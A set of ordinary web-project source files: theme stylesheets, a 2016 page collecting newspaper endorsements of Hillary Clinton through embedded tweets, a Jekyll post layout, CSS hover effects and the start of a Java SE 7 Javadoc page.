}
.navbar-default li a:hover{
color: #0884d5;
background: none;
}
.skills .navbar-default,
.client .navbar-default{
margin-left: 35px;
}
.live-preview .btn-common{
margin-top: 21px;
padding: 13px 45px;
}
/*****************************
Blog Default
*****************************/
.single-blog.timeline {
background: #FFFFFF;
border: 1px solid #EEEEEE;
border-bottom: 0;
position: relative;
padding-bottom: 0;
}
.timeline .post-content {
padding: 20px 20px 0;
}
.post-thumb{
margin: -1px -1px 0;
position: relative;
overflow: hidden;
}
.timeline .post-thumb img {
width: 100%;
}
.post-thumb iframe{
width: 100%;
min-height: 270px;
border: 0;
}
.post-overlay{
position: absolute;
top: 50%;
display: none;
width: 94px;
height: 140px;
margin-top: -70px;
overflow: hidden;
}
.post-overlay span{
position: absolute;
left: 50%;
bottom: 0;
margin-left: -60px;
-webkit-animation: fadeInUp 400ms;
animation: fadeInUp 400ms;
z-index: 9;
}
.post-overlay span:before{
position: absolute;
bottom: 0;
border-style: solid;
border-width: 60px;
content: "";
border-color: transparent transparent #0884d5 transparent;
z-index: -1;
cursor: initial;
}
.post-overlay span a{
font-size: 30px;
color: #fff;
background: transparent;
padding: 0;
margin-left: 50px;
}
.single-blog:hover .post-overlay{
display: block;
-webkit-animation: fadeIn 300ms;
animation: fadeIn 300ms;
}
.timeline-divider{
position: relative;
padding-top: 50px;
}
.timeline-divider:before{
position: absolute;
top: 0;
content: "";
border-left-style: solid;
border-left-width: 1px;
height: 100%;
border-left-color: #0099AE;
left: 50%;
margin-left: -2px;
}
.timeline-blog .col-sm-6.padding-top{
padding-top: 70px;
}
.post-content{
padding: 20px 0;
}
.timeline-date .btn-common{
font-size: 18px;
color: #4a4a4a;
font-weight: 300;
border-radius: 0;
padding: 17px 40px;
}
.arrow-right{
position: relative;
}
.arrow-right:after{
position: absolute;
right: 1px;
content: "";
top: 15px;
background: url(../images/blog/left.png);
width: 43px;
height: 54px;
}
.arrow-left{
position: relative;
}
.arrow-left:before{
position: absolute;
left: -2px;
content: "";
top: 86px;
background: url(../images/blog/right.png);
width: 43px;
height: 54px;
}
.post-title {
margin-top: 0;
}
.post-title a,
.comments-number a{
color: #686868;
}
.post-content .post-author{
margin-top: 0;
}
.post-content .post-author a{
font-weight: 300;
font-size: 14px;
color: #0099AE;
}
a.read-more{
color: #0099AE;
font-weight: 300;
}
a.read-more:hover{
color: #01707F
}
.post-bottom{
border-top: 1px solid #eeeeee;
padding-top: 10px;
margin-top: 20px;
margin: 20px -20px 0;
padding: 20px 20px 0;
}
/*****************************
Blog with right sidebar
*****************************/
.single-blog{
padding-bottom: 30px;
}
.single-blog .post-bottom{
border-bottom: 1px solid #eeeeee;
padding-top: 10px;
padding-bottom: 10px;
}
.single-blog .post-overlay span{
left: 0;
top: 0;
margin-left: 0;
width: 94px;
height: 140px;
background: url(../images/blog/blog-arrow.png);
-webkit-animation: fadeInLeft 400ms;
animation: fadeInLeft 400ms;
}
.single-blog .post-overlay span a{
margin-left: 8px;
font-weight: 700;
font-size: 36px;
line-height: 18px;
position: absolute;
top: 50px;
}
.single-blog .post-overlay span a small{
font-size: 16px;
font-weight: 300;
margin-left: 5px;
}
.single-blog .post-overlay span:before{
border-color: transparent;
border-width: 0;
}
.post-nav{
margin:0;
padding: 0;
}
.post-nav li a{
color: #0099AE;
padding: 0;
text-align: left;
}
.post-nav li a i{
color: #0099AE;
margin-right: 8px;
}
.post-nav li a:hover{
background: none;
}
.blog-padding-right{
padding-right:35px;
}
.blog-pagination {
text-align: center;
padding-top: 10px;
padding-bottom: 55px;
}
/*****************************
Blog with right sidebar
*****************************/
.masonery_area .single-blog{}
.masonery_area .single-blog .post-thumb{
height: auto;
}
.masonery_area .single-blog .post-title{
margin-top: 5px;
}
.masonery_area .single-blog .post-title a{
font-size: 20px;
}
.masonery_area .single-blog .post-thumb img{
height:auto;
}
.masonery_area .single-blog .post-bottom{
border-top:0;
padding-top:0;
margin-top:15px;
}
/* Audio CSS */
.audiojs{
background:#C03035;
height: 45px;
width: 100%;
}
.audiojs .scrubber{
background: #fff;
height: 8px;
border-top: 0;
width: 170px;
margin-top: 19px;
margin-left: 12px;
border-radius: 10px;
}
.audiojs .play-pause{
background: #a92b2f;
width: 68px;
height: 45px;
padding: 0;
padding-left: 24px;
padding-top: 10px;
border-right: 0;
}
.audiojs .time{
display: none;
}
.audiojs .progress{
background: #A92B2F;
height: 8px;
border-radius: 10px;
}
.audiojs .loaded{
background:#fff;
height: 8px;
border-radius: 10px;
}
/*****************************
Blog Details
*****************************/
.navbar-nav.post-nav li{
margin-right: 60px;
}
.single-blog.blog-details .post-content{
padding-top: 30px;
}
.single-blog.blog-details .post-bottom{
margin-top: 55px;
}
.blog-share{
margin-top: 40px;
background: #f5f5f5;
display: inline-block;
padding: 2px 0;
}
span.stMainServices,
span.stButton_gradient,
.stButton .chicklets{
height:24px !important;
}
.author-profile.padding{
padding-top:50px;
}
.author-profile .col-sm-2 img{
width: 100%;
border-left: 3px solid #0099AE;
}
.author-profile h3{
margin-top:0;
color: #3a424c;
}
.author-profile p{
color: #3a424c;
font-weight: 400;
}
.author-profile span a{
color: #C03035;
}
.response-area{
border-bottom: 0;
}
.response-area h2{
margin-top: 0;
margin-bottom: 0;
border-bottom: 0;
padding-bottom: 20px;
}
.post-comment{
padding-left: 70px;
padding-top: 36px;
border-top: 1px solid #f1e8dd;
}
.post-comment .pull-left img{
margin-right: 60px;
border-left: 3px solid #0884d5;
}
.post-comment .media-body{
padding-top: 6px;
border-bottom: 0;
padding-bottom: 50px;
}
.post-comment .media-body p{
margin-top:10px;
}
.post-comment .media-body span i{
color: #C03035;
margin-right: 10px;
}
.post-comment .media-body span a{
color: #C03035;
font-weight: 700;
}
.post-comment .media-body .post-nav li a{
font-weight: 300;
}
.parrent .media-list{
margin-left: 190px;
}
.parrent .post-comment{
padding-left: 0;
margin-left: 70px;
}
/****************************
********* Contact Us*********
*****************************/
#map-section {
margin-top: 50px;
margin-bottom: 50px;
position: relative;
}
#gmap {
height: 350px;
}
.get-in-touch img {
margin-top: 35px;
margin-bottom: 32px;
}
.get-in-touch p {
font-size: 18px;
font-weight: 300;
}
#map-section .contact-info {
position: absolute;
background-color: #7c3651;
right: 0;
top: 0;
width: 33%;
height: 100%;
padding:25px 50px;
opacity: 0.9;
color: #fff;
}
#map-section .contact-info h2,
#map-section .contact-info a {
color: #fff
}
#map-section address a:hover {
color:#00AEEF
}
#contact-form #message{
resize:none;
}
#contact-form .btn-submit {
width: 28%;
margin: 5px auto;
}
.corporate-info .corporate-address {
background-image: url("../images/contact-bg.png");
background-position: left top;
background-repeat: no-repeat;
overflow: hidden;
padding-bottom: 50px;
}
.corporate-info .corporate-address address {
background-image: url("../images/icon-map.png");
background-position: left top;
background-repeat: no-repeat;
padding-left: 40px;
}
/****************************
****** Price-table CSS*******
*****************************/
.price-table {
margin-top: 88px;
margin-bottom: 96px;
}
.single-price ul {
padding: 0;
margin: 0;
list-style: none;
}
.table-heading {
background-color: transparent !important;
color: #FFFFFF !important;
overflow: hidden;
padding: 0 !important;
text-align: center;
}
.single-price.price-one .plan-name,
.single-price.price-two .plan-name,
.single-price.price-three .plan-name,
.single-price.price-four .plan-name {
color: #fff;
font-size: 20px;
margin-bottom: 0;
padding: 10px 0;
text-transform: capitalize;
}
.single-price.price-one .plan-name {
background-color: #0e76bc;
}
.single-price.price-two .plan-name {
background-color: #ac2429;
}
.single-price.price-three .plan-name {
background-color: #ed8d1b;
}
.single-price.price-four .plan-name {
background-color: #6c825f;
}
.single-price .plan-price {
color: #fff;
float: none;
font-size: 14px;
height: 110px;
margin-bottom: 15px;
overflow: hidden;
position: relative;
z-index: 5;
padding-top: 15px;
}
.plan-price .dollar-sign {
font-size: 18px;
}
.plan-price .price {
font-size: 24px;
}
.plan-price .month {
display: block;
margin-top: -6px;
}
.price-one .plan-price:after,
.price-two .plan-price:after,
.price-three .plan-price:after,
.price-four .plan-price:after {
border-style: solid;
border-width: 110px;
content: "";
height: 0;
left:50%;
position: absolute;
top: 0;
width: 0;
z-index: -1;
margin-left: -110px;
}
.price-one .plan-price:after {
border-color: #0d6fb1 transparent transparent;
}
.price-two .plan-price:after {
border-color: #ac2429 transparent transparent;
}
.price-three .plan-price:after {
border-color: #e78817 transparent transparent;
}
.price-four .plan-price:after {
border-color: #5f7452 transparent transparent;
}
.single-price ul li,
.single-table ul li {
padding: 12px 18px;
background-color: #f7f7f7;
margin-bottom: 5px;
color: #696969;
}
.single-price ul li span,
.single-table ul li span {
float: right;
}
.price-one .btn-buynow,
.price-two .btn-buynow,
.price-three .btn-buynow,
.price-four .btn-buynow {
border-radius: 0;
color: #fff;
padding: 12px;
font-weight: 300;
letter-spacing: 3px;
text-transform: uppercase;
display: block;
}
.price-one .btn-buynow {
background-color: #0d6fb1;
}
.price-two .btn-buynow {
background-color: #ac2429;
}
.price-three .btn-buynow {
background-color: #e78817;
}
.price-four .btn-buynow {
background-color: #5f7452;
}
.price-one .btn-buynow:hover {
background-color: #0a5a90;
}
.price-two .btn-buynow:hover {
background-color: #821b1e;
}
.price-three .btn-buynow:hover {
background-color: #c57413;
}
.price-four .btn-buynow:hover {
background-color: #48583e;
}
.price-table2, .price-table3{
margin-bottom:125px;
}
.price-table4 {
margin-bottom: 150px
}
.table-one .table-header,
.table-two .table-header,
.table-three .table-header,
.table-four .table-header {
overflow: hidden;
padding:20px;
color: #fff;
}
.table-one .table-header {
background-color:#0e76bc;
}
.table-two .table-header {
background-color:#c03035;
}
.table-three .table-header {
background-color:#ed8d1b;
}
.table-four .table-header {
background-color:#6c825f;
}
.single-table {
position: relative;
padding-top: 60px;
}
.table-one:before,
.table-two:before,
.table-three:before,
.table-four:before {
border-style: solid;
border-width: 0 130px 60px;
content: "";
height: 0;
left: 0;
position: absolute;
top: 0;
width: 100%;
}
.table-one:before {
border-color: transparent transparent #0d6fb1;
}
.table-two:before {
border-color: transparent transparent #ac2429;
}
.table-three:before {
border-color: transparent transparent #e78817;
}
.table-four:before {
border-color: transparent transparent #5f7452;
}
.table-header h2 {
color: #fff;
float: left;
font-size: 24px;
margin-top: 7px;
}
.table-header .plan-price {
float: right;
margin: 0;
overflow: hidden;
padding-top: 1px;
}
.single-table .btn-signup {
display: block;
text-align: center;
position:relative;
z-index:1;
}
.single-table ul {
margin: 0;
padding: 0;
}
.table-one .btn-signup:after,
.table-two .btn-signup:after,
.table-three .btn-signup:after,
.table-four .btn-signup:after {
content: "";
position: absolute;
border-style: solid;
border-width: 78px 130px 0;
height: 0;
left: 0;
top: -1px;
width: 100%;
z-index: -1;
}
.table-one .btn-signup:after {
border-color: #0d6fb1 transparent transparent;
}
.table-two .btn-signup:after {
border-color: #ac2429 transparent transparent;
}
.table-three .btn-signup:after {
border-color: #e78817 transparent transparent;
}
.table-four .btn-signup:after {
border-color: #5f7452 transparent transparent;
}
.single-table .btn-signup a {
color: #fff;
display: inline-block;
overflow: hidden;
padding: 20px 0 0 0;
text-transform: uppercase;
letter-spacing: 3px;
}
.table-one .btn-signup:hover.btn-signup:after{
border-color: #0b598d transparent transparent;
}
.table-two .btn-signup.btn-signup:hover:after {
border-color: #831c20 transparent transparent;
}
.table-three .btn-signup.btn-signup:hover:after {
border-color: #bd7014 transparent transparent;
}
.table-four .btn-signup.btn-signup:hover:after{
border-color: #3d4b35 transparent transparent;
}
/*************************
********404 page CSS******
**************************/
#error-page {
display: table;
height: 100%;
min-height: 100%;
width: 100%;
color: #686868;
font-size: 18px;
font-weight: 300;
padding: 100px 0;
}
#error-page .container-fluid {
overflow: hidden;
}
.error-page-inner {
display: table-cell;
vertical-align: middle;
}
.bg-404 {
background-image: url("../images/home/tour-bg.png");
background-repeat: repeat-x;
background-position: center top;
}
.error-image {
display: inline-block;
padding-top: 50px;
padding-bottom: 50px;
}
.error-image img {
width: 100%;
}
#error-page h2 {
font-size:36px;
text-transform: uppercase;
}
.btn-error {
font-weight: 300;
margin-top: 30px;
padding:25px 55px;
text-transform: uppercase;
font-size: 16px;
letter-spacing: 5px;
background-color: transparent;
border: 1px solid #cc9b59;
margin-top: 50px;
margin-bottom: 50px;
}
.btn-error:hover, .btn-error:focus {
background-color: #cc9b59;
border-color:#cc9b59;
color:#fff;
}
#error-page i, #coming-soon i {
border: 1px solid #cc9b59;
height: 40px;
width: 40px;
line-height: 40px;
color: #cc9b59;
font-size: 17px;
margin:0 15px;
border-radius: 50%;
-webkit-transition: all 0.3s ease-in-out;
-moz-transition: all 0.3s ease-in-out;
-ms-transition: all 0.3s ease-in-out;
-o-transition: all 0.3s ease-in-out;
transition: all 0.3s ease-in-out;
}
#error-page i:hover, #coming-soon i:hover {
background-color: #cc9b59;
color: #fff;
-webkit-transition: all 0.3s ease-in-out;
-moz-transition: all 0.3s ease-in-out;
-ms-transition: all 0.3s ease-in-out;
-o-transition: all 0.3s ease-in-out;
transition: all 0.3s ease-in-out;
}
/*************************
********404 page CSS******
**************************/
#error-page {
display: table;
height: 100%;
min-height: 100%;
width: 100%;
color: #686868;
font-size: 18px;
font-weight: 300;
padding: 100px 0;
}
#error-page .container-fluid {
overflow: hidden;
}
.error-page-inner {
display: table-cell;
vertical-align: middle;
}
.bg-404 {
background-image: url("../images/404-bg.png");
background-repeat: repeat-x;
background-position: center top;
}
.error-image {
display: inline-block;
padding-top: 50px;
padding-bottom: 50px;
}
.error-image img {
width: 100%;
}
#error-page h2 {
font-size:36px;
text-transform: uppercase;
}
.btn-error {
background-color: rgba(0, 0, 0, 0);
border: 3px solid #4FCCCD;
color: #797979;
font-size: 16px;
font-weight: 700;
letter-spacing:0;
margin-bottom: 50px;
margin-top: 50px;
padding: 25px 53px;
text-transform: uppercase;
font-family: 'Open Sans', sans-serif;
}
.btn-error:hover, .btn-error:focus {
background-color: #4FCCCD;
border-color:#4FCCCD;
color:#fff;
}
#error-page i, #coming-soon i {
border: 3px solid #cecece;
height: 40px;
width: 40px;
line-height: 35px;
color: #cecece;
font-size: 17px;
margin:0 15px;
border-radius: 50%;
-webkit-transition: all 0.3s ease-in-out;
-moz-transition: all 0.3s ease-in-out;
-ms-transition: all 0.3s ease-in-out;
-o-transition: all 0.3s ease-in-out;
transition: all 0.3s ease-in-out;
}
#error-page i.fa-twitter:hover,
#coming-soon i.fa-twitter:hover,
#error-page i.fa-twitter:hover,
#coming-soon i.fa-twitter:hover,
#error-page i.fa-google-plus:hover,
#coming-soon i.fa-google-plus:hover {
-webkit-transition: all 0.3s ease-in-out;
-moz-transition: all 0.3s ease-in-out;
-ms-transition: all 0.3s ease-in-out;
-o-transition: all 0.3s ease-in-out;
transition: all 0.3s ease-in-out;
}
#error-page i.fa-facebook:hover,
#coming-soon i.fa-facebook:hover{
background-color:transparent;
color: #314A87;
border-color:#314A87;
}
#error-page i.fa-twitter:hover,
#coming-soon i.fa-twitter:hover{
background-color:transparent;
color: #22BBF4;
border-color:#22BBF4;
}
#error-page i.fa-google-plus:hover,
#coming-soon i.fa-google-plus:hover{
background-color:transparent;
color: #DD4C3B;
border-color:#DD4C3B;
}
/*************************
******Coming Soon CSS*****
**************************/
.logo-image {
display: block;
text-align: center;
margin-top: 80px;
margin-bottom: 95px;
}
.logo-image img {
display: inline-block;
}
#coming-soon {
background-image: url("../images/coming-soon-bg.png");
background-position: center top;
background-repeat: repeat-x;
padding: 40px 0;
overflow: hidden;
}
#coming-soon .social-link {
margin-top: 35px;
}
.time-count {
display: block;
text-align: center;
}
.time-count ul {
padding-left: 0;
}
#countdown {
display: block;
max-width: 960px;
margin: 80px auto 100px;
}
#countdown li {
float: left;
display: block;
width: 25%;
text-align: center;
height: 254px;
background-position: 50% 0;
background-repeat: no-repeat;
background-size: contain !important;
position: relative;
color: #fff;
}
#countdown li.angle-one {
background-image: url(../images/coming-soon1.png);
left: 120px;
}
#countdown li.angle-two {
background-image: url(../images/coming-soon2.png);
left: 40px;
}
#countdown li.angle-three {
background-image: url(../images/coming-soon3.png);
right: 40px;
}
#countdown li.angle-four {
background-image: url(../images/coming-soon4.png);
right: 120px;
}
#countdown li > span {
font-size: 48px;
line-height: 48px;
font-weight: 700;
color: #fff;
display: inline-block;
margin-top: 40px;
}
#countdown li.angle-two > span,
#countdown li.angle-four > span {
margin-top: 80px;
}
#subscribe {
background-color: #565656;
color: #FFFFFF;
padding: 40px 0 50px;
}
#subscribe h2 {
color: #fff;
text-transform: uppercase;
}
#subscribe .fa-envelope-o {
color: #0884d5;
margin-right: 5px;
}
#subscribe .form-control {
background-color: transparent;
height: 52px;
color: #fff;
border:2px solid #00aeef;
}
#newsletter {
margin-top: 35px;
position: relative;
}
#newsletter i {
color: #0884d5;
font-size: 36px;
position: absolute;
right: 12px;
top: 7px;
}
.newsletter p {
color: #919191;
font-size: 12px;
margin-top: 10px;
}
#coming-soon-footer {
padding: 45px 0;
line-height: 15px;
overflow: hidden;
}
#coming-soon-footer a {
color: #d89b4e;
}
#coming-soon-footer a:hover {
color: #b38040
}
/*Shortcodes CSS*/
.bs-example{
margin: 0 0 20px;
}
.panel-group{
border: 1px solid #eee;
}
.panel-default{
border: 0;
}
.panel-group .panel{
border-radius: 0;
}
.panel-group .panel+.panel{
margin-top: 0;
}
.panel-default>.panel-heading{
background-color: transparent;
border-top: 1px solid #eee;
}
.panel-group .panel-default:first-child>.panel-heading{
border-top: 0;
}
.panel-default>.panel-heading+.panel-collapse .panel-body{
border-top-color: #eee;
}
.nav-pills>li.active>a, .nav-pills>li.active>a:hover, .nav-pills>li.active>a:focus{
background-color: #4FCCCD;
}
.tab-content {
padding-top: 20px;
}
/*Features*/
.feature-inner{
text-align: center;
}
.icon-wrapper{
display: inline-block;
background-color: #4FCCCD;
color: #fff;
padding: 25px;
box-shadow: 0 0 0 5px rgba(0,0,0,.1) inset;
-webkit-box-shadow: 0 0 0 5px rgba(0,0,0,.1) inset;
border-radius: 100%;
margin: 10px 0;
}
|
endorsements.html
|
whereistanya/not-my-locker-room
|
<!DOCTYPE html>
<html lang="en-us">
<head>
<meta charset="UTF-8">
<title>We're with her</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#157878">
<link rel="stylesheet" href="css/normalize.css">
<link href="https://fonts.googleapis.com/css?family=Oswald:300,700|Special+Elite" rel="stylesheet">
<link rel="stylesheet" href="css/style.css">
</head>
<body>
<section class="page-header" style="background-image: url(img/hillary.jpg)">
<h2 class="project-tagline">Across the political spectrum, newspapers are saying:</h2>
<h1 class="project-name">We're with her</h1>
<span class="photo-credit">Photo: Marc Nozell</span>
</section>
<section class="main-content">
<h3>Endorsements:</h3>
<!-- ATHLETE FEED -->
<div class="content twitter"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The NYT Editorial Board's endorsement of Hillary Clinton for president <a href="https://t.co/oO4HNIoRwy">https://t.co/oO4HNIoRwy</a> via <a href="https://twitter.com/nytopinion">@nytopinion</a> <a href="https://t.co/bfRezJdlns">pic.twitter.com/bfRezJdlns</a></p>— The New York Times (@nytimes) <a href="https://twitter.com/nytimes/status/780138577132937216">September 25, 2016</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script></div>
<div class="content twitter"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The Atlantic makes our third endorsement in history: <a href="https://t.co/9ZcbSAmD0j">https://t.co/9ZcbSAmD0j</a> <a href="https://t.co/EvrHCEd6bk">pic.twitter.com/EvrHCEd6bk</a></p>— The Atlantic (@TheAtlantic) <a href="https://twitter.com/TheAtlantic/status/783760939858395136">October 5, 2016</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script></div>
<div class="content twitter"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">We found it civically vital to reprint our recommendation for <a href="https://twitter.com/HillaryClinton">@HillaryClinton</a> in 4 languages widely spoken here <a href="https://t.co/Mvq24FeYwG">https://t.co/Mvq24FeYwG</a> <a href="https://t.co/Ex58cg2dAu">pic.twitter.com/Ex58cg2dAu</a></p>— Houston Chronicle (@HoustonChron) <a href="https://twitter.com/HoustonChron/status/788022336695865344">October 17, 2016</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script></div>
<div class="content website"><span class="website-content">Hillary Clinton is one of the best prepared candidates to seek the presidency in many years.</span>
<span class="website-url"><a href="http://www.latimes.com/opinion/editorials/la-ed-hillary-endorsement-20160923-snap-story.html">http://www.latimes.com/opinion/editorials/la-ed-hillary-endorsement-20160923-snap-story.html</a></span><br><br></div>
<div class="content twitter"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The Arizona Republic ed board has endorsed <a href="https://twitter.com/HillaryClinton">@HillaryClinton</a>. See why: <a href="https://t.co/FqStTwkesL">https://t.co/FqStTwkesL</a> via <a href="https://twitter.com/azcopinions">@azcopinions</a> <a href="https://twitter.com/hashtag/elections2016?src=hash">#elections2016</a></p>— azcentral (@azcentral) <a href="https://twitter.com/azcentral/status/780937672223256576">September 28, 2016</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script></div>
<div class="content website"><span class="website-content">...we have not been guarded at expressing our admiration for Ms. Clinton's experience, depth of knowledge, steadiness and leadership, nor have we hesitated to point out the utter lack of those qualities in her Republican opponent, Donald Trump.</span>
<span class="website-url"><a href="http://www.baltimoresun.com/news/opinion/editorial/bs-ed-hillary-clinton-endorsement-20160929-story.html">http://www.baltimoresun.com/news/opinion/editorial/bs-ed-hillary-clinton-endorsement-20160929-story.html</a></span><br><br></div>
<div class="content twitter"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Endorsement: We're with Hillary Clinton. Frankly, Donald Trump's dangerous. <a href="https://t.co/XYPCJ7MuXW">https://t.co/XYPCJ7MuXW</a> <a href="https://t.co/BwdYOJOOsM">pic.twitter.com/BwdYOJOOsM</a></p>— AL.com Birmingham (@ALcomBirmingham) <a href="https://twitter.com/ALcomBirmingham/status/785098210452922368">October 9, 2016</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script></div>
<div class="content website"><span class="website-content">This paper has not endorsed a Democrat for president in its 148-year history. But we endorse Clinton.</span>
<span class="website-url"><a href="http://www.sandiegouniontribune.com/opinion/the-conversation/sd-hillary-clinton-endorsement-for-president-20160929-story.html">http://www.sandiegouniontribune.com/opinion/the-conversation/sd-hillary-clinton-endorsement-for-president-20160929-story.html</a></span><br><br></div>
<div class="content twitter"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Vogue endorses <a href="https://twitter.com/HillaryClinton">@HillaryClinton</a> for president of the United States: <a href="https://t.co/4zstNuUu16">https://t.co/4zstNuUu16</a> <a href="https://t.co/k9tS50Gxy5">pic.twitter.com/k9tS50Gxy5</a></p>— Vogue Magazine (@voguemagazine) <a href="https://twitter.com/voguemagazine/status/788412745049837569">October 18, 2016</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script></div>
<!-- FOOTER -->
<footer class="site-footer">
<p>Built by DevProgress. <a href="https://devprogress.us/">Find out more</a>.</p>
<p class="site-footer-credits">This page was generated by <a href="https://pages.github.com">GitHub Pages</a> using the <a href="https://github.com/jasonlong/cayman-theme">Cayman theme</a> by <a href="https://twitter.com/jasonlong">Jason Long</a>.</p>
</footer>
</section>
<!-- Scripts -->
<script id="twitter-wjs" type="text/javascript" async defer src="//platform.twitter.com/widgets.js"></script>
</body>
</html>
|
_layouts/lifestream.html
|
rtaibah/jekyll-blog
|
---
layout: default
---
<article id="lifestream" class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
<header class="post-header">
<h1 class="post-title p-name" itemprop="name headline">{{ page.title | escape }}</h1>
<p class="post-meta">
<time class="dt-published" datetime="{{ page.date | date_to_xmlschema }}" itemprop="datePublished">
{%- assign date_format = site.minima.date_format | default: "%b %-d, %Y" -%}
{{ page.date | date: date_format }}
</time>
{%- if page.author -%}
• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">{{ page.author }}</span></span>
{%- endif -%}</p>
</header>
<div class="post-content e-content" itemprop="articleBody">
{{ content }}
</div>
{%- if site.disqus.shortname -%}
{%- include disqus_comments.html -%}
{%- endif -%}
<a class="u-url" href="{{ page.url | relative_url }}" hidden></a>
</article>
|
css/hoverEffects.css
|
Deku/GroupFinder
|
.grid {
position: relative;
clear: both;
margin: 0 auto;
padding: 1em 0 4em;
max-width: 1000px;
list-style: none;
text-align: center;
}
/* Common style */
.grid figure {
position: relative;
float: left;
overflow: hidden;
margin: 10px 1%;
width: 30%;
height: auto;
background: #3085a3;
text-align: center !important;
cursor: pointer;
box-shadow: #ddd 1px 1px 1px;
}
.grid figure img {
position: relative;
display: block;
min-height: 100%;
max-width: 100%;
opacity: 0.8;
}
.grid figure figcaption {
padding: 2em;
color: #fff !important;
text-transform: uppercase;
font-size: 1.25em !important;
-webkit-backface-visibility: hidden !important;
backface-visibility: hidden;
}
.grid figure figcaption::before,
.grid figure figcaption::after {
pointer-events: none;
}
.grid figure figcaption,
.grid figure figcaption > a {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
}
/* Anchor will cover the whole item by default */
/* For some effects it will show as a button */
.grid figure figcaption > a {
z-index: 1000;
text-indent: 200%;
white-space: nowrap;
opacity: 0;
}
.grid figure h2 {
font-weight: 600;
color: #fff !important;
text-shadow: 1px 1px 2px rgba(0,0,0,0.5);
}
.grid figure h2,
.grid figure p {
margin: 0;
}
.grid figure p {
letter-spacing: 1px;
font-size: .6em;
}
/* Individual effects */
/*---------------*/
/***** Zoe *****/
/*---------------*/
figure.effect-zoe figcaption {
top: auto;
bottom: 0;
padding: 1em;
height: 3.75em;
background: #fff;
color: #3c4a50;
-webkit-transition: -webkit-transform 0.35s;
transition: transform 0.35s;
-webkit-transform: translate3d(0,100%,0);
transform: translate3d(0,100%,0);
}
figure.effect-zoe p.icon-links a {
float: right;
color: #3c4a50;
padding-left: 1em;
}
figure.effect-zoe:hover p.icon-links a:hover,
figure.effect-zoe:hover p.icon-links a:focus {
color: #252d31;
}
figure.effect-zoe p.description {
position: absolute;
bottom: 4em;
padding: 2em;
color: #fff;
text-transform: none;
font-size: 1em !important;
opacity: 0;
-webkit-transition: opacity 0.35s;
transition: opacity 0.35s;
-webkit-backface-visibility: hidden; /* Fix for Chrome 37.0.2062.120 (Mac) */
}
figure.effect-zoe p.icon-links a {
-webkit-transition: -webkit-transform 0.35s;
transition: transform 0.35s;
-webkit-transform: translate3d(0,200%,0);
transform: translate3d(0,200%,0);
}
figure.effect-zoe h2 {
position: absolute;
top: 2em;
left: 0;
right: 0;
z-index: 1;
-webkit-transition: -webkit-transform 0.35s;
transition: transform 0.35s;
-webkit-transform: translate3d(0,20px,0);
transform: translate3d(0,20px,0);
}
figure.effect-zoe p.icon-links a i::before {
display: inline-block;
padding: 8px 0;
speak: none;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
figure.effect-zoe:hover p.description {
opacity: 1;
}
figure.effect-zoe:hover figcaption,
figure.effect-zoe:hover h2,
figure.effect-zoe:hover p.icon-links a {
-webkit-transform: translate3d(0,0,0);
transform: translate3d(0,0,0);
}
figure.effect-zoe:hover h2 {
-webkit-transform: translate3d(0,0,0);
transform: translate3d(0,0,0);
}
figure.effect-zoe:hover h2 {
-webkit-transition-delay: 0.05s;
transition-delay: 0.05s;
}
figure.effect-zoe:hover p.icon-links a:nth-child(3) {
-webkit-transition-delay: 0.1s;
transition-delay: 0.1s;
}
figure.effect-zoe:hover p.icon-links a:nth-child(2) {
-webkit-transition-delay: 0.15s;
transition-delay: 0.15s;
}
figure.effect-zoe:hover p.icon-links a:first-child {
-webkit-transition-delay: 0.2s;
transition-delay: 0.2s;
}
/* Media queries */
@media screen and (max-width: 50em) {
.content {
padding: 0 10px;
text-align: center;
}
.grid figure {
display: inline-block;
float: none;
margin: 10px auto;
width: 100%;
}
}
|
doc/java/jdk7/javax/management/class-use/MBeanParameterInfo.html
|
fbiville/annotation-processing-ftw
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.6.0_18) on Thu Dec 18 17:18:37 PST 2014 -->
<title>Uses of Class javax.management.MBeanParameterInfo (Java Platform SE 7 )</title>
<meta name="date" content="2014-12-18">
<link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class javax.management.MBeanParameterInfo (Java Platform SE 7 )";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><em><strong>Java™ Platform<br>Standard Ed. 7</strong></em></div>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?javax/management/class-use/MBeanParameterInfo.html" target="_top">Frames</a></li>
